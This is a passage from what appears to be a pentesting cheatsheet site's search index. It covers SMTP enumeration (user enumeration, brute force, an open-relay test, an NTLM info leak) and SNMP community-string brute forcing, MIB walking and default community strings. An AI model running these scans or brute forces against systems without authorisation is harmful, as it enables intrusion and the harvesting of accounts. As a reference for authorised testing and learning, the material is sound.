\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-enum-users \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-open-relay \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-ntlm-info \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Windows NTLM info leak\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-vuln-cve2010-4344 \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Exim heap overflow\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 25,587,465 --script smtp-* \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"open-relay-testing\"\u003eOpen Relay Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO test.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eMAIL FROM:\u0026lt;attacker@attacker.com\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRCPT TO:\u0026lt;victim@external-domain.com\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# If accepted = open relay!\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDATA\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSubject: relay test\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eThis is a test.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eQUIT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Automated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-open-relay \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args smtp-open-relay.from\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003esender@test.com,smtp-open-relay.to\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003evictim@gmail.com \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit\"\u003eMetasploit\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_version\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_enum\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_relay\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ntlm-info-leak-windows-smtp\"\u003eNTLM Info Leak (Windows SMTP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Triggers Windows SMTP servers to reveal hostname, domain, OS version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-ntlm-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Manual\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO test\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eAUTH NTLM\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Decode the Base64 response with ntlmdecoder or responder\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-wordlists\"\u003eUseful Wordlists\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e/usr/share/seclists/Usernames/top-usernames-shortlist.txt\n/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n\u003c/code\u003e\u003c/pre\u003e","title":"SMTP"},{"content":"SNMP Enumeration Cheatsheet Default Ports: 161 (UDP — queries), 162 (UDP — traps)\nSNMP Versions Version Auth Notes v1 Community string Cleartext, oldest v2c Community string Cleartext, most common v3 Username + auth + encryption Secure, rarely misconfigured Detection nmap -sU -p 161 \u0026lt;ip\u0026gt; nmap -sU -p 161 -sV \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-info \u0026lt;ip\u0026gt; Community String Brute Force # onesixtyone (fast UDP brute) onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt \u0026lt;ip\u0026gt; onesixtyone -c community.txt -i ips.txt # Nmap nmap -sU -p 161 --script snmp-brute \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-brute \\ --script-args snmp-brute.communitiesdb=communities.txt \u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/snmp/snmp_login set RHOSTS \u0026lt;ip\u0026gt; run snmpwalk — Walking the MIB Tree # Full walk (v1/v2c) snmpwalk -v1 -c public \u0026lt;ip\u0026gt; snmpwalk -v2c -c public \u0026lt;ip\u0026gt; # Target specific OIDs snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1 # System info snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.4.2 # Running processes snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.6.3 # Installed software snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.4.1.77.1.2.25 # Windows user accounts snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.2.2 # Network interfaces # SNMPv3 snmpwalk -v3 -u \u0026lt;user\u0026gt; -l AuthPriv \\ -a MD5 -A \u0026lt;authpass\u0026gt; -x DES -X \u0026lt;privpass\u0026gt; \u0026lt;ip\u0026gt; snmpget — Single OID Query snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.1.0 # sysDescr snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.5.0 # sysName (hostname) snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.6.0 # sysLocation snmp-check snmp-check \u0026lt;ip\u0026gt; snmp-check \u0026lt;ip\u0026gt; -c public snmp-check \u0026lt;ip\u0026gt; -c public -v 2c braa — Bulk SNMP braa public@\u0026lt;ip\u0026gt;:.1.3.6.* braa public@192.168.1.1-254:.1.3.6.1.2.1.1.1.0 Nmap SNMP Scripts nmap -sU -p 161 --script snmp-info \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-sysdescr \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-interfaces \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-processes \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-users \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-services \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-software \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-* \u0026lt;ip\u0026gt; Key OIDs Reference OID Description 1.3.6.1.2.1.1.1.0 System description 1.3.6.1.2.1.1.3.0 System uptime 1.3.6.1.2.1.1.5.0 Hostname 1.3.6.1.2.1.1.6.0 System location 1.3.6.1.2.1.25.1.6.0 Running OS processes 1.3.6.1.2.1.25.4.2.1.2 Process names 1.3.6.1.2.1.25.6.3.1.2 Installed packages 1.3.6.1.4.1.77.1.2.25 Windows user accounts 1.3.6.1.2.1.6.13.1.3 TCP open ports 1.3.6.1.2.1.2.2.1.2 Interface names 1.3.6.1.2.1.2.2.1.11 Interface in-packets Common Community Strings public private manager community snmp cisco monitor 0 internal ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/snmp/","summary":"\u003ch1 id=\"snmp-enumeration-cheatsheet\"\u003eSNMP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 161 (UDP — queries), 162 (UDP — traps)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"snmp-versions\"\u003eSNMP Versions\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eVersion\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eAuth\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eNotes\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev1\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity string\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCleartext, oldest\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev2c\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCommunity string\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCleartext, most common\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ev3\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUsername + auth + encryption\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSecure, rarely misconfigured\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"detection\"\u003eDetection\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"community-string-brute-force\"\u003eCommunity String Brute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# onesixtyone (fast UDP brute)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eonesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eonesixtyone -c community.txt -i ips.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args snmp-brute.communitiesdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ecommunities.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/snmp/snmp_login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"snmpwalk--walking-the-mib-tree\"\u003esnmpwalk — Walking the MIB Tree\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full walk (v1/v2c)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v1 -c public \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Target specific OIDs\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1 \u003cspan style=\"color:#75715e\"\u003e# System info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.4.2 \u003cspan style=\"color:#75715e\"\u003e# Running processes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.6.3 \u003cspan style=\"color:#75715e\"\u003e# Installed software\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.6.13.1.3 \u003cspan style=\"color:#75715e\"\u003e# Open TCP ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.4.1.77.1.2.25 \u003cspan style=\"color:#75715e\"\u003e# Windows user accounts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.2.2 \u003cspan style=\"color:#75715e\"\u003e# Network interfaces\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SNMPv3\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpwalk -v3 -u \u0026lt;user\u0026gt; -l AuthPriv \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e -a MD5 -A \u0026lt;authpass\u0026gt; -x DES -X \u0026lt;privpass\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"snmpget--single-oid-query\"\u003esnmpget — Single OID Query\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.1.0 \u003cspan style=\"color:#75715e\"\u003e# sysDescr\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.5.0 \u003cspan style=\"color:#75715e\"\u003e# sysName (hostname)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.6.0 \u003cspan style=\"color:#75715e\"\u003e# sysLocation\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"snmp-check\"\u003esnmp-check\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt; -c public\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esnmp-check \u0026lt;ip\u0026gt; -c public -v 2c\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"braa--bulk-snmp\"\u003ebraa — Bulk SNMP\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebraa public@\u0026lt;ip\u0026gt;:.1.3.6.*\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ebraa public@192.168.1.1-254:.1.3.6.1.2.1.1.1.0\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-snmp-scripts\"\u003eNmap SNMP Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-sysdescr \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-interfaces \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-processes \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-users \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-services \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-win32-software \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU -p \u003cspan style=\"color:#ae81ff\"\u003e161\u003c/span\u003e --script snmp-* \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-oids-reference\"\u003eKey OIDs Reference\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOID\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.1.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem description\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.3.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem uptime\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.5.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHostname\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.1.6.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSystem location\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.1.6.0\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRunning OS processes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.4.2.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eProcess names\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.25.6.3.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInstalled packages\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.4.1.77.1.2.25\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWindows user accounts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.6.13.1.3\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTCP open ports\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.2.2.1.2\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInterface names\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e1.3.6.1.2.1.2.2.1.11\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInterface in-packets\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-community-strings\"\u003eCommon Community Strings\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003epublic private manager\ncommunity snmp cisco\nmonitor 0 internal\n\u003c/code\u003e\u003c/pre\u003e","title":"SNMP"},{"content":"SSH Enumeration 